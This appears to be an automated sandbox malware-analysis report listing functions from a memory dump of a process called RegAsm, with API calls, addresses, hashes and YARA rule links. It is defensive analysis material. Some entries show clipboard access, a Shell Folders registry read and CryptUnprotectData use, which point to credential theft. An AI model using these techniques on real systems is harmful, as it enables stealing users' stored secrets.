                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@
                                                                                • String ID:
                                                                                • API String ID: 613200358-0
                                                                                • Opcode ID: 6cac8f1a699deb91221d7a6f108e22352180a1071cf07404188a59dfc78ebdbf
                                                                                • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                • Opcode Fuzzy Hash: 6cac8f1a699deb91221d7a6f108e22352180a1071cf07404188a59dfc78ebdbf
                                                                                • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                Function 004096C3 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID:
                                                                                • API String ID: 823142352-0
                                                                                • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                Function 004096DC Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID:
                                                                                • API String ID: 823142352-0
                                                                                • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                Function 0040AA04 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@
                                                                                • String ID:
                                                                                • API String ID: 613200358-0
                                                                                • Opcode ID: 9f3c014d0cf6ef3ef7071a5cb6dd1d5584685ccd4eb021183226fc9c7d12a071
                                                                                • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                • Opcode Fuzzy Hash: 9f3c014d0cf6ef3ef7071a5cb6dd1d5584685ccd4eb021183226fc9c7d12a071
                                                                                • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                Function 0040B04B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@
                                                                                • String ID:
                                                                                • API String ID: 613200358-0
                                                                                • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                Function 004135E0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FreeLibrary.KERNEL32(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: FreeLibrary
                                                                                • String ID:
                                                                                • API String ID: 3664257935-0
                                                                                • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                Function 0041493C Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • EnumResourceNamesW.KERNEL32(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: EnumNamesResource
                                                                                • String ID:
                                                                                • API String ID: 3334572018-0
                                                                                • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                Function 0044DEA5 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: FreeLibrary
                                                                                • String ID:
                                                                                • API String ID: 3664257935-0
                                                                                • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                Function 0040AEBE Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindClose.KERNEL32(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: CloseFind
                                                                                • String ID:
                                                                                • API String ID: 1863332320-0
                                                                                • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                Function 00414592 Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Open
                                                                                • String ID:
                                                                                • API String ID: 71445658-0
                                                                                • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                                • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                                Function 00409B98 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: AttributesFile
                                                                                • String ID:
                                                                                • API String ID: 3188754299-0
                                                                                • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                Function 0041BE52 Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                                • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                • Opcode Fuzzy Hash: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                                • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                Function 004095D9 Relevance: 1.3, APIs: 1, Instructions: 66COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • memset.MSVCRT ref: 004095FC
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                  • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                  • Part of subcall function 004091B8: memcpy.MSVCRT ref: 004092C9
                                                                                  • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                • String ID:
                                                                                • API String ID: 3655998216-0
                                                                                • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                Function 00445403 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • memset.MSVCRT ref: 00445426
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                  • Part of subcall function 0040B6EF: CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                • String ID:
                                                                                • API String ID: 1828521557-0
                                                                                • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                Function 004068BF Relevance: 1.3, APIs: 1, Instructions: 59COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                  • Part of subcall function 004062A6: SetFilePointerEx.KERNEL32(0040627C,?,?,00000000,00000000), ref: 004062C2
                                                                                • memcpy.MSVCRT ref: 00406942
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ??2@FilePointermemcpy
                                                                                • String ID:
                                                                                • API String ID: 609303285-0
                                                                                • Opcode ID: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                                • Opcode Fuzzy Hash: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                                Function 00406B90 Relevance: 1.3, APIs: 1, Instructions: 56COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: _wcsicmp
                                                                                • String ID:
                                                                                • API String ID: 2081463915-0
                                                                                • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                Function 00406214 Relevance: 1.3, APIs: 1, Instructions: 39COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF), ref: 0040629C
                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: File$CloseCreateErrorHandleLastRead
                                                                                • String ID:
                                                                                • API String ID: 2136311172-0
                                                                                • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                Function 0040AFCF Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ??2@??3@
                                                                                • String ID:
                                                                                • API String ID: 1936579350-0
                                                                                • Opcode ID: c1d2223be94a68f833538aabce888aab0279aa93460cd9bacb51074fa57d6133
                                                                                • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                • Opcode Fuzzy Hash: c1d2223be94a68f833538aabce888aab0279aa93460cd9bacb51074fa57d6133
                                                                                • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8

                                                                                Non-executed Functions

                                                                                Function 004098E2 Relevance: 16.6, APIs: 11, Instructions: 59clipboardmemoryfileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • EmptyClipboard.USER32 ref: 004098EC
                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                • GlobalFix.KERNEL32(00000000), ref: 00409927
                                                                                • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                • GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                • GetLastError.KERNEL32 ref: 0040995D
                                                                                • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                • GetLastError.KERNEL32 ref: 00409974
                                                                                • CloseClipboard.USER32 ref: 0040997D
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                                                                                • String ID:
                                                                                • API String ID: 2565263379-0
                                                                                • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                                • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                                Function 0040987A Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • EmptyClipboard.USER32 ref: 00409882
                                                                                • wcslen.MSVCRT ref: 0040988F
                                                                                • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                • GlobalFix.KERNEL32(00000000), ref: 004098AC
                                                                                • memcpy.MSVCRT ref: 004098B5
                                                                                • GlobalUnWire.KERNEL32(00000000), ref: 004098BE
                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                • CloseClipboard.USER32 ref: 004098D7
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpywcslen
                                                                                • String ID:
                                                                                • API String ID: 2014503067-0
                                                                                • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                                • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                                Function 004182CE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLastError.KERNEL32 ref: 004182D7
                                                                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                • LocalFree.KERNEL32(?), ref: 00418342
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00418370
                                                                                  • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
                                                                                  • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: FormatMessage$??3@ByteCharErrorFreeLastLocalMultiVersionWidemalloc
                                                                                • String ID: OsError 0x%x (%u)
                                                                                • API String ID: 403622227-2664311388
                                                                                • Opcode ID: 63f4947bb6e883e354d3d2ebf96ad5df6c46b6e8727c7c07250c00721f9c325d
                                                                                • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                • Opcode Fuzzy Hash: 63f4947bb6e883e354d3d2ebf96ad5df6c46b6e8727c7c07250c00721f9c325d
                                                                                • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                Function 0041739B Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Version
                                                                                • String ID:
                                                                                • API String ID: 1889659487-0
                                                                                • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                                                                                • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                                                                                Function 00402279 Relevance: 110.5, APIs: 9, Strings: 54, Instructions: 285COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _wcsicmp.MSVCRT ref: 004022A6
                                                                                • _wcsicmp.MSVCRT ref: 004022D7
                                                                                • _wcsicmp.MSVCRT ref: 00402305
                                                                                • _wcsicmp.MSVCRT ref: 00402333
                                                                                  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                  • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                                                                • memset.MSVCRT ref: 0040265F
                                                                                • memcpy.MSVCRT ref: 0040269B
                                                                                  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                  • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                • memcpy.MSVCRT ref: 004026FF
                                                                                • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
